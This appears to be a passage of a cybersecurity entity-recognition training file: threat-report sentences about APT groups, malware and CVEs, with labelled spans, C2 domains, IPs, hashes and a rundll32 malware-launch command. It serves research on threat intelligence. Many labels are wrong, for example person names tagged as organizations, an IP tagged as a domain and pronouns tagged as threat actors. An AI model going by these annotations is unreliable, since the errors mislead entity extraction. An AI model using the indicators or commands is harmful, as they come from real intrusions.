"THREAT_ACTOR: OilRig": [[12833, 12839]], "THREAT_ACTOR: Crambus": [[12842, 12849]], "THREAT_ACTOR: APT34": [[12856, 12861]], "THREAT_ACTOR: COBALT TRINITY": [[12866, 12880]], "THREAT_ACTOR: Elfin": [[12895, 12900]], "THREAT_ACTOR: APT33": [[12905, 12910]], "MALWARE: post-intrusion tools": [[13221, 13241]], "FILEPATH: DanBot": [[13322, 13328]], "MALWARE: Get-LAPSP.ps1": [[13367, 13380]], "MALWARE: PowerShell script": [[13386, 13403]], "MALWARE: DanBot": [[13500, 13506]], "MALWARE: maldocs": [[13602, 13609]], "THREAT_ACTOR: LYCEUM’s": [[13770, 13778], [14357, 14365]], "ORGANIZATION: executives": [[13792, 13802]], "ORGANIZATION: HR staff": [[13805, 13813]], "ORGANIZATION: IT personnel": [[13820, 13832]], "MALWARE: maldoc": [[13875, 13881]], "ORGANIZATION: ICS": [[13906, 13909]], "ORGANIZATION: OT staff": [[13913, 13921]], "ORGANIZATION: energy organizations": [[14187, 14207]], "THREAT_ACTOR: groups": [[14649, 14655]], "THREAT_ACTOR: Machete": [[14804, 14811], [14999, 15006], [15210, 15217], [15377, 15384], [15483, 15490], [15595, 15602], [15823, 15830], [16382, 16389], [16921, 16928], [17049, 17056], [17182, 17189], [17311, 17318], [17411, 17418], [17533, 17540], [17635, 17642], [17731, 17738], [18111, 18118], [18592, 18599], [18602, 18609]], "MALWARE: malware": [[14904, 14911]], "ORGANIZATION: ESET": [[14959, 14963], [15992, 15996], [16771, 16775], [17252, 17256], [18357, 18361]], "TOOL: Python-based": [[15020, 15032]], "ORGANIZATION: Ecuadorean military": [[15138, 15157]], "THREAT_ACTOR: Their": [[15228, 15233]], "ORGANIZATION: describe navigation routes": [[15413, 15439]], "FILEPATH: Previous versions": [[15723, 15740]], "THREAT_ACTOR: Cylance": [[15781, 15788]], "FILEPATH: GoogleUpdate.exe": [[15903, 15919]], "TOOL: C&C": [[15979, 15982], [18453, 18456]], "FILEPATH: malware": [[16113, 16120]], "THREAT_ACTOR: Machete's": [[16618, 16627]], "ORGANIZATION: Cylance": [[17027, 17034]], "THREAT_ACTOR: They": [[17791, 17795]], "THREAT_ACTOR: OceanLotus": [[19013, 19023]], "FILEPATH: They": [[19250, 19254]], "THREAT_ACTOR: HackingTeam": [[19458, 19469]], "ORGANIZATION: report": [[19720, 19726]], "THREAT_ACTOR: SectorJ04": [[19788, 19797], [19924, 19933], [19966, 19975], [20201, 20210], [20672, 20681], [20763, 20772], [21024, 21033], [21344, 21353]], "ORGANIZATION: industrial sectors": [[20031, 20049]], "THREAT_ACTOR: SectorJ04's": [[20437, 20448]], "THREAT_ACTOR: attacker’s": [[20645, 20655]], "TOOL: Word": [[20826, 20830]], "FILEPATH: document files": [[20865, 20879]], "ORGANIZATION: financial institutions": [[21067, 21089]], "ORGANIZATION: medical": [[21267, 21274]], "ORGANIZATION: pharmaceutical": [[21277, 21291]], "ORGANIZATION: media": [[21294, 21299]], "ORGANIZATION: energy": [[21302, 21308]], "ORGANIZATION: manufacturing": [[21313, 21326]], "MALWARE: ServHelper": [[21393, 21403]], "MALWARE: FlawedAmmy RAT": [[21408, 21422]]}, "info": {"id": "cyberner_stix_train_007910", "source": "cyberner_stix_train"}}
{"text": "They quickly move away from their initial access vector to hide their entry point and then target Exchange servers as a new access vector .", "spans": {}, "info": {"id": "cyberner_stix_train_007911", "source": "cyberner_stix_train"}}
{"text": "This version includes 185 different applications , including official applications of worldwide banks . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": {"VULNERABILITY: CVE-2017-0143": [[104, 117]], "MALWARE: tools—EternalRomance": [[153, 173]], "MALWARE: EternalSynergy—that": [[178, 197]], "MALWARE: custom dropper": [[316, 330]], "FILEPATH: MagicHound.DropIt": [[358, 375]]}, "info": {"id": "cyberner_stix_train_007912", "source": "cyberner_stix_train"}}
{"text": "Additionally , open sources have reported for several years that in Russia and China , high-profile hotel guests may expect their hotel rooms to be accessed and their laptops and other electronic devices accessed .", "spans": {}, "info": {"id": "cyberner_stix_train_007913", "source": "cyberner_stix_train"}}
{"text": "Across two campaigns of several million messages each , the actor used both macro laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs .", "spans": {"TOOL: macro": [[76, 81]], "ORGANIZATION: Microsoft": [[88, 97]], "TOOL: Word": [[98, 102]], "TOOL: zipped": [[117, 123]], "TOOL: VBScript": [[124, 132]], "MALWARE: Trojan": [[160, 166]], "TOOL: PCs": [[187, 190]]}, "info": {"id": "cyberner_stix_train_007914", "source": "cyberner_stix_train"}}
{"text": "PackageInstaller shows the app ’ s permission access and asks for the user 's approval , which then installs the application . This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post . 360 and Tuisec already identified some Gorgon Group members .", "spans": {"THREAT_ACTOR: APT33": [[342, 347]], "ORGANIZATION: FireEye": [[385, 392]], "ORGANIZATION: 360": [[405, 408]], "ORGANIZATION: Tuisec": [[413, 419]], "THREAT_ACTOR: Gorgon Group": [[444, 456]], "ORGANIZATION: members": [[457, 464]]}, "info": {"id": "cyberner_stix_train_007915", "source": "cyberner_stix_train"}}
{"text": "After reversing these opcodes , we were able to update our interpreter script to support both 32-bit and 64-bit virtual machines used by FinFisher . These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . The size of the payload is encoded within the first four pixels of the image . TLDR OilRig is leveraging a new backdoor dubbed Marlin as part of a longrunning espionage campaign that started in April 2018 .", "spans": {"MALWARE: FinFisher": [[137, 146]], "TOOL: HTML application": [[219, 235]], "MALWARE: HTA": [[238, 241]], "THREAT_ACTOR: OilRig": [[336, 342]], "MALWARE: Marlin": [[379, 385]]}, "info": {"id": "cyberner_stix_train_007916", "source": "cyberner_stix_train"}}
{"text": "We also found the init0 script running ; the script cleans out all miners regardless of its origin .", "spans": {}, "info": {"id": "cyberner_stix_train_007917", "source": "cyberner_stix_train"}}
{"text": "Check Point Research reported these dangerous apps to Google upon discovery . Russian-speaking hackers are believed to be responsible for these attacks and used the Corkow Trojan . We named the first group RevengeHotels , and the second ProCC . Chinese state - sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies , including the State Department .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[54, 60]], "TOOL: Corkow Trojan": [[165, 178]], "THREAT_ACTOR: RevengeHotels": [[206, 219]], "THREAT_ACTOR: ProCC": [[237, 242]], "THREAT_ACTOR: Chinese state - sponsored actors": [[245, 277]], "ORGANIZATION: U.S.-based organizations": [[334, 358]], "ORGANIZATION: federal government agencies": [[363, 390]], "ORGANIZATION: State Department": [[407, 423]]}, "info": {"id": "cyberner_stix_train_007918", "source": "cyberner_stix_train"}}
{"text": "This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose . some indications of loosely linked activity dating back to at least 2013 .", "spans": {"ORGANIZATION: FireEye": [[25, 32]], "THREAT_ACTOR: group": [[51, 56]], "THREAT_ACTOR: hackers": [[74, 81]], "THREAT_ACTOR: admin@338": [[89, 98]], "THREAT_ACTOR: attackers": [[158, 167]], "ORGANIZATION: government officials": [[177, 197]], "THREAT_ACTOR: cyber espionage": [[233, 248]]}, "info": {"id": "cyberner_stix_train_007919", "source": "cyberner_stix_train"}}
{"text": "Another trick in “ Agent Smith ’ s arsenal is to change the settings of the update timeout , making the original application wait endlessly for the update check . We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology . The now-malicious processes are released from suspension and run . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": {"MALWARE: Agent Smith": [[19, 30]], "THREAT_ACTOR: Anchor Panda": [[213, 225]], "ORGANIZATION: naval": [[349, 354]], "ORGANIZATION: aerospace technology": [[359, 379]]}, "info": {"id": "cyberner_stix_train_007920", "source": "cyberner_stix_train"}}
{"text": "Inside the SDK The malware resides within the ‘ RXDrioder ’ Software Development Kit ( SDK ) , which is provided by ‘ addroider [ . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities . Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India .", "spans": {"THREAT_ACTOR: APT38": [[152, 157]], "ORGANIZATION: banking": [[274, 281]], "ORGANIZATION: government organizations": [[318, 342]], "ORGANIZATION: information technology services": [[356, 387]], "ORGANIZATION: government": [[397, 407]]}, "info": {"id": "cyberner_stix_train_007921", "source": "cyberner_stix_train"}}
{"text": "Filename : ntslwin.exe MD5 : f4cab3a393462a57639faa978a75d10a .", "spans": {"FILEPATH: ntslwin.exe": [[11, 22]], "FILEPATH: f4cab3a393462a57639faa978a75d10a": [[29, 61]]}, "info": {"id": "cyberner_stix_train_007922", "source": "cyberner_stix_train"}}
{"text": "The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware . Silence also used Russian-language web hosting services .", "spans": {"THREAT_ACTOR: WIZARD SPIDER": [[4, 17]], "TOOL: TrickBot banking malware": [[67, 91]], "MALWARE: web hosting services": [[129, 149]]}, "info": {"id": "cyberner_stix_train_007923", "source": "cyberner_stix_train"}}
{"text": "However , although the “ Concipit1248 ” app requested permissions to open the device camera and read photos , the code only can upload a self-contained PNG file to a remote sever . Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute . in addition to normal operations mentioned in the original cases . It is attributed to Iranian statesponsored APT Charming Kitten , whose other recent attacks include targeting world leaders attending the Munich Security Conference and the T20 Summit in Saudi Arabia in an effort to steal their email credentials , targeting Israeli scholars and U.S. government employees in another credentialstealing effort last July , and also attacking the reelection effort of former President Donald Trump .", "spans": {"THREAT_ACTOR: GCMAN group": [[228, 239]], "ORGANIZATION: bank": [[272, 276]], "THREAT_ACTOR: Iranian statesponsored APT Charming Kitten": [[440, 482]], "ORGANIZATION: world leaders attending the Munich Security Conference and the T20 Summit": [[530, 603]], "ORGANIZATION: Israeli scholars": [[678, 694]], "ORGANIZATION: U.S. government employees": [[699, 724]]}, "info": {"id": "cyberner_stix_train_007924", "source": "cyberner_stix_train"}}
{"text": "But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from your android successfully , the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone . The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 . We will describe APT1 ’s backdoors in two categories : “ Beachhead Backdoors ” and “ Standard Backdoors. ” The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": {"MALWARE: Android.Oldboot": [[4, 19]], "SYSTEM: android": [[118, 125]], "THREAT_ACTOR: Goldmouse": [[379, 388]], "THREAT_ACTOR: APT1": [[432, 436]], "MALWARE: malware": [[552, 559]], "MALWARE: massively multiplayer online role - playing games": [[589, 638]]}, "info": {"id": "cyberner_stix_train_007925", "source": "cyberner_stix_train"}}
{"text": "Conclusions This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques , including patching system libraries . We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 . From our observations , it is one of the most prolific cyber espionage groups in terms of the sheer quantity of information stolen . The attackers left a small clue in the code , in the form of the number 666 ( 0x29A hex ) before one of the decryption subroutines : • By analysing the logs from the command servers , we have observed 59 unique victims in 23 countries : For the detailed analysis and information on how to protect against the attack , please read :", "spans": {"SYSTEM: Google Play Store": [[52, 69]], "ORGANIZATION: Kaspersky": [[208, 217]], "TOOL: Octopus": [[286, 293]], "THREAT_ACTOR: attackers": [[495, 504]], "SYSTEM: the command servers": [[653, 672]]}, "info": {"id": "cyberner_stix_train_007926", "source": "cyberner_stix_train"}}
{"text": "They appear to have been active since 2006 .", "spans": {}, "info": {"id": "cyberner_stix_train_007927", "source": "cyberner_stix_train"}}
{"text": "Symantec has also been able to connect earlier attack campaigns with Sowbug , demonstrating that it has been active since at least early-2015 and may have been operating even earlier . LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Sowbug": [[69, 75]], "THREAT_ACTOR: Barium": [[194, 200]], "ORGANIZATION: SOC personnel": [[271, 284]]}, "info": {"id": "cyberner_stix_train_007928", "source": "cyberner_stix_train"}}
{"text": "Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . \" Machete \" is a targeted attack campaign with Spanish speaking roots .", "spans": {"ORGANIZATION: Kaspersky": [[14, 23]], "THREAT_ACTOR: Lazarus": [[50, 57]], "ORGANIZATION: mobile gaming": [[77, 90]]}, "info": {"id": "cyberner_stix_train_007929", "source": "cyberner_stix_train"}}
{"text": "Defense against FinFisher Exposing as much of FinFisher ’ s riddles as possible during this painstaking analysis has allowed us to ensure our customers are protected against this advanced piece of malware . menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy . OceanLotus : {9E3BD021-B5AD-49DEAE93-F178329EE0FE} C&C URLs varies content is read from resource P1/2 . Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month , while PLAY focused on Switzerland ( 5 ) .", "spans": {"MALWARE: FinFisher": [[16, 25], [46, 55]], "THREAT_ACTOR: OceanLotus": [[352, 362]], "THREAT_ACTOR: 8BASE": [[503, 508]], "ORGANIZATION: Brazil": [[537, 543]], "THREAT_ACTOR: PLAY": [[579, 583]], "ORGANIZATION: Switzerland": [[595, 606]]}, "info": {"id": "cyberner_stix_train_007930", "source": "cyberner_stix_train"}}
{"text": "APT28 used this technique to steal usernames and hashed passwords that allowed escalation of privileges in the victim network .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_007931", "source": "cyberner_stix_train"}}
{"text": "] today somtum [ . This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang . The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe . Furthermore , the process that created the web shell was UMWorkerProcess.exe , the process responsible for Exchange Server ’s Unified Messaging Service .", "spans": {"ORGANIZATION: Fox-IT": [[86, 92]], "THREAT_ACTOR: Mofang": [[143, 149]], "FILEPATH: Backdoor.APT.Aumlib": [[197, 216]], "FILEPATH: Backdoor.APT.Ixeshe": [[221, 240]], "SYSTEM: Exchange Server ’s Unified Messaging Service": [[350, 394]]}, "info": {"id": "cyberner_stix_train_007932", "source": "cyberner_stix_train"}}
{"text": "While FireEye has not directly observed BACKSWING delivering BADRABBIT , BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol.com , which hosted the BADRABBIT dropper . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": {"ORGANIZATION: FireEye": [[6, 13], [142, 149]], "ORGANIZATION: BACKSWING": [[40, 49], [73, 82]], "MALWARE: BADRABBIT": [[61, 70]], "MALWARE: BADRABBIT dropper": [[198, 215]], "MALWARE: PIVY": [[288, 292]], "FILEPATH: malicious files": [[516, 531]]}, "info": {"id": "cyberner_stix_train_007933", "source": "cyberner_stix_train"}}
{"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . When G-Data published on Turla/Uroburos back in February , several questions remained unanswered .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day vulnerability": [[65, 87]], "ORGANIZATION: G-Data": [[252, 258]], "THREAT_ACTOR: Turla/Uroburos": [[272, 286]]}, "info": {"id": "cyberner_stix_train_007934", "source": "cyberner_stix_train"}}
{"text": "Use caution and exercise due diligence when faced with a shortened link , especially in unsolicited email messages .", "spans": {"TOOL: email": [[100, 105]]}, "info": {"id": "cyberner_stix_train_007935", "source": "cyberner_stix_train"}}
{"text": "] today svcws [ . This sample was also found to be deployed using the CVE-2012-0158 vulnerability . We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"VULNERABILITY: CVE-2012-0158": [[70, 83]], "ORGANIZATION: Malwarebytes EDR and MDR": [[220, 244]]}, "info": {"id": "cyberner_stix_train_007936", "source": "cyberner_stix_train"}}
{"text": "Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain . However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": {"THREAT_ACTOR: XENOTIME": [[166, 174]], "ORGANIZATION: Dragos WorldView": [[282, 298]]}, "info": {"id": "cyberner_stix_train_007937", "source": "cyberner_stix_train"}}
{"text": "The client deserializes the packet into IPacket GetSystemInfo .", "spans": {}, "info": {"id": "cyberner_stix_train_007938", "source": "cyberner_stix_train"}}
{"text": "Some common techniques include : basic XOR encryption , nested XOR and custom key-derivation methods . APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications . RunAs Create new process as another User or Process context . In a modern ransomware attack the target is an entire organisation , not just one or two computers .", "spans": {"THREAT_ACTOR: APT5": [[103, 107]], "ORGANIZATION: telecommunications": [[207, 225]], "ORGANIZATION: technology companies": [[230, 250]], "ORGANIZATION: satellite communications": [[282, 306]], "ORGANIZATION: entire organisation , not just one or two computers": [[418, 469]]}, "info": {"id": "cyberner_stix_train_007939", "source": "cyberner_stix_train"}}
{"text": "Technical Analysis Permissions Marcher ’ s APK size is fairly small ( only 683KB for sample eb8f02fc30ec49e4af1560e54b53d1a7 ) , much smaller than most legitimate apps and other popular mobile malware samples . The first sample being captured was in April 2018 and since that we observed a lot more related ones . ZxShell is a sophisticated tool employed by Group 72 that contains all kinds of functionality . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n’t granular enough .", "spans": {"MALWARE: Marcher": [[31, 38]], "MALWARE: ZxShell": [[314, 321]], "THREAT_ACTOR: Group 72": [[358, 366]], "SYSTEM: Google Analytics platform": [[417, 442]], "ORGANIZATION: CSP": [[595, 598]]}, "info": {"id": "cyberner_stix_train_007940", "source": "cyberner_stix_train"}}
{"text": "EventBot Sending the pin code back to the C2 Sending the pin code back to the C2 . While investigating KerrDown we found multiple RAR files containing a variant of the malware . The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: KerrDown": [[103, 111]], "ORGANIZATION: we": [[112, 114]]}, "info": {"id": "cyberner_stix_train_007941", "source": "cyberner_stix_train"}}
{"text": "Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities . Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek — the CEOs of Facebook , Twitter , Google and Spotify , respectively — have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "THREAT_ACTOR: APT28": [[10, 15]], "ORGANIZATION: military": [[114, 122]], "ORGANIZATION: Mark Zuckerberg": [[134, 149]], "ORGANIZATION: Jack Dorsey": [[152, 163]], "ORGANIZATION: Sundar Pichai": [[166, 179]], "ORGANIZATION: Daniel Ek": [[186, 195]], "ORGANIZATION: CEOs": [[202, 206]], "ORGANIZATION: Facebook": [[210, 218]], "ORGANIZATION: Twitter": [[221, 228]], "ORGANIZATION: Google": [[231, 237]], "ORGANIZATION: technology": [[360, 370]]}, "info": {"id": "cyberner_stix_train_007942", "source": "cyberner_stix_train"}}
{"text": "The organization was closed after the CSIS presentation . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks . The emails normally come from compromised personal accounts or are entirely spoofed . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": {"ORGANIZATION: CSIS": [[38, 42]], "ORGANIZATION: IT": [[148, 150]], "ORGANIZATION: financial institutions": [[189, 211]], "TOOL: emails": [[281, 287]], "MALWARE: NetSupport RAT": [[598, 612]]}, "info": {"id": "cyberner_stix_train_007943", "source": "cyberner_stix_train"}}
{"text": "For example , the summer 2015 attack that used the unusual ' resume ' would not have been successful on Windows 10 as-is because of the presence of the Supervisor Mode Execution Prevention ( SMEP ) mitigation , even without the latest security updates installed . As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection .", "spans": {}, "info": {"id": "cyberner_stix_train_007944", "source": "cyberner_stix_train"}}
{"text": "[ Note : The analysis of the functionality below describes a single app , but applies to all apps of the Android/AdDisplay.Ashas family . Kaspersky wrote about LuckyMouse targeting national data centers in June . The handling of instructions has improved too .", "spans": {"MALWARE: Android/AdDisplay.Ashas family": [[105, 135]], "ORGANIZATION: Kaspersky": [[138, 147]], "ORGANIZATION: LuckyMouse": [[160, 170]]}, "info": {"id": "cyberner_stix_train_007945", "source": "cyberner_stix_train"}}
{"text": "The loader used by the sample purported to have been compiled on the 25th of March 2010 .", "spans": {}, "info": {"id": "cyberner_stix_train_007946", "source": "cyberner_stix_train"}}
{"text": "To their credit , both Google and Amazon appear to have put pressure on device manufacturers to fix their devices when flaws are found , Strazzere says . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . C2 : krjregh.sacreeflame.com .", "spans": {"ORGANIZATION: Google": [[23, 29]], "ORGANIZATION: Amazon": [[34, 40]], "VULNERABILITY: CVE-2017-11882": [[182, 196]], "VULNERABILITY: CVE-2018-0802": [[201, 214]], "TOOL: weaponizer": [[221, 231]], "THREAT_ACTOR: actors": [[280, 286]], "TOOL: C2": [[436, 438]], "DOMAIN: krjregh.sacreeflame.com": [[441, 464]]}, "info": {"id": "cyberner_stix_train_007947", "source": "cyberner_stix_train"}}
{"text": "HummingBad sends notifications to Umeng , a tracking and analytics service attackers use to manage their campaign . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . APT33 : 64.251.19.217 [REDACTED].servehttp.com . Cuba ransomware was first observed in 2019 .", "spans": {"MALWARE: HummingBad": [[0, 10]], "THREAT_ACTOR: Lazarus": [[130, 137]], "ORGANIZATION: enterprises": [[232, 243]], "THREAT_ACTOR: attackers": [[255, 264]], "THREAT_ACTOR: APT33": [[332, 337]], "DOMAIN: 64.251.19.217": [[340, 353]], "DOMAIN: [REDACTED].servehttp.com": [[354, 378]], "MALWARE: Cuba ransomware": [[381, 396]]}, "info": {"id": "cyberner_stix_train_007948", "source": "cyberner_stix_train"}}
{"text": "The report also includes a mention of the same IP address used as Command & Control server in the attack against Bundestag ( 176.31.112.10 ) .", "spans": {"TOOL: Command & Control": [[66, 83]], "ORGANIZATION: Bundestag": [[113, 122]], "IP_ADDRESS: 176.31.112.10": [[125, 138]]}, "info": {"id": "cyberner_stix_train_007949", "source": "cyberner_stix_train"}}
{"text": "The 2016 presidential election has the world ’s attention , and leaders of other states are anxiously watching and planning for possible outcomes .", "spans": {}, "info": {"id": "cyberner_stix_train_007950", "source": "cyberner_stix_train"}}
{"text": "We named this campaign “ Bouncing Golf ” based on the malware ’ s code in the package named “ golf. ” June 18 , 2019 We uncovered a cyberespionage campaign targeting Middle Eastern countries . Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims . The operating system also creates a registry key within the software registry hive that is specifically associated with the creation of the scheduled task on the destination host : Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1 . Researchers have uncovered an ongoing cyberespionage campaign targeting more than 30 online video game companies over the past four years .", "spans": {"MALWARE: Bouncing Golf": [[25, 38]], "THREAT_ACTOR: Samurai Panda": [[193, 206]], "SYSTEM: Microsoft\\Windows": [[545, 562]], "ORGANIZATION: Researchers": [[611, 622]], "ORGANIZATION: online video game companies": [[696, 723]]}, "info": {"id": "cyberner_stix_train_007951", "source": "cyberner_stix_train"}}
{"text": "Extremely high-volume campaigns distributing Locky exclusively in July 2016 , consistently delivering tens of millions of messages .", "spans": {"MALWARE: Locky": [[45, 50]]}, "info": {"id": "cyberner_stix_train_007952", "source": "cyberner_stix_train"}}
{"text": "The attacker can choose the data types to collect , which are written in a certain format . ScarCruft uses a multi-stage binary infection scheme . The malware is designed for receiving modules to be executed in-memory and sending the results to C2s . Recently , this model for threat actors has come to be known as the “ as - a - service \" model , borrowing the term from the growing trend in the tech industry .", "spans": {"THREAT_ACTOR: ScarCruft": [[92, 101]], "THREAT_ACTOR: threat actors": [[277, 290]]}, "info": {"id": "cyberner_stix_train_007953", "source": "cyberner_stix_train"}}
{"text": "In most cases they would be crafted to appear as applications distributed by unspecified mobile operators in Italy . Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it . Feature-wise , the RAT has three commands : UNC2529 displayed indications of target research based on their selection of sender email addresses and subject lines which were tailored to their intended victims .", "spans": {"TOOL: Clayslide": [[316, 325]], "TOOL: RAT": [[397, 400]], "THREAT_ACTOR: UNC2529": [[422, 429]]}, "info": {"id": "cyberner_stix_train_007954", "source": "cyberner_stix_train"}}
{"text": "While WERDLOD kills processes for Internet Explorer , Firefox , and Chrome , OSX_DOK.C does the same on Safari , Firefox , and Chrome .", "spans": {"MALWARE: WERDLOD": [[6, 13]], "TOOL: Internet Explorer": [[34, 51]], "TOOL: Firefox": [[54, 61], [113, 120]], "TOOL: Chrome": [[68, 74], [127, 133]], "MALWARE: OSX_DOK.C": [[77, 86]], "TOOL: Safari": [[104, 110]]}, "info": {"id": "cyberner_stix_train_007955", "source": "cyberner_stix_train"}}
{"text": "Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": {"THREAT_ACTOR: Whitefly": [[88, 96]], "ORGANIZATION: defense": [[130, 137]], "ORGANIZATION: telecoms": [[140, 148]], "ORGANIZATION: energy": [[155, 161]], "FILEPATH: slides": [[234, 240]], "VULNERABILITY: exploit": [[253, 260]], "VULNERABILITY: CVE-2017-8759": [[265, 278]], "TOOL: Microsoft .NET framework": [[322, 346]]}, "info": {"id": "cyberner_stix_train_007956", "source": "cyberner_stix_train"}}
{"text": "It was executed via rundll32 commands such as : rundll32.exe “ C:\\Windows\\twain_64.dll ” .", "spans": {"FILEPATH: rundll32.exe": [[48, 60]], "FILEPATH: C:\\Windows\\twain_64.dll": [[63, 86]]}, "info": {"id": "cyberner_stix_train_007957", "source": "cyberner_stix_train"}}
{"text": "Pivoting from the Mozilla v5.1 user agent revealed over forty additional Zebrocy samples , with several again targeting the same Central Asian nation .", "spans": {"ORGANIZATION: Mozilla": [[18, 25]], "MALWARE: Zebrocy": [[73, 80]]}, "info": {"id": "cyberner_stix_train_007958", "source": "cyberner_stix_train"}}
{"text": "The initial dropper , upon execution , extracts an embedded Downeks instance :", "spans": {"MALWARE: Downeks": [[60, 67]]}, "info": {"id": "cyberner_stix_train_007959", "source": "cyberner_stix_train"}}
{"text": "The attack involving this updated variant of DealersChoice was targeting a European government organization .", "spans": {"TOOL: DealersChoice": [[45, 58]]}, "info": {"id": "cyberner_stix_train_007960", "source": "cyberner_stix_train"}}
{"text": "A Humanitarian Bulletin published by the United Nations ’ Office for the Coordination of Humanitarian Affairs indicates in March 2017 ( just before the first malware samples associated with this campaign were identified in early April ) Hamas created “ a parallel institution to run local ministries in Gaza , ”", "spans": {"ORGANIZATION: United Nations ’ Office": [[41, 64]], "ORGANIZATION: Coordination of Humanitarian Affairs": [[73, 109]], "ORGANIZATION: Hamas": [[237, 242]]}, "info": {"id": "cyberner_stix_train_007961", "source": "cyberner_stix_train"}}
{"text": "Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services . After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought .", "spans": {"TOOL: Metel": [[0, 5]], "TOOL: banking Trojan": [[11, 25]], "THREAT_ACTOR: Corkow": [[42, 48]], "ORGANIZATION: CTU": [[202, 205]], "THREAT_ACTOR: TG-3390": [[220, 227]]}, "info": {"id": "cyberner_stix_train_007963", "source": "cyberner_stix_train"}}
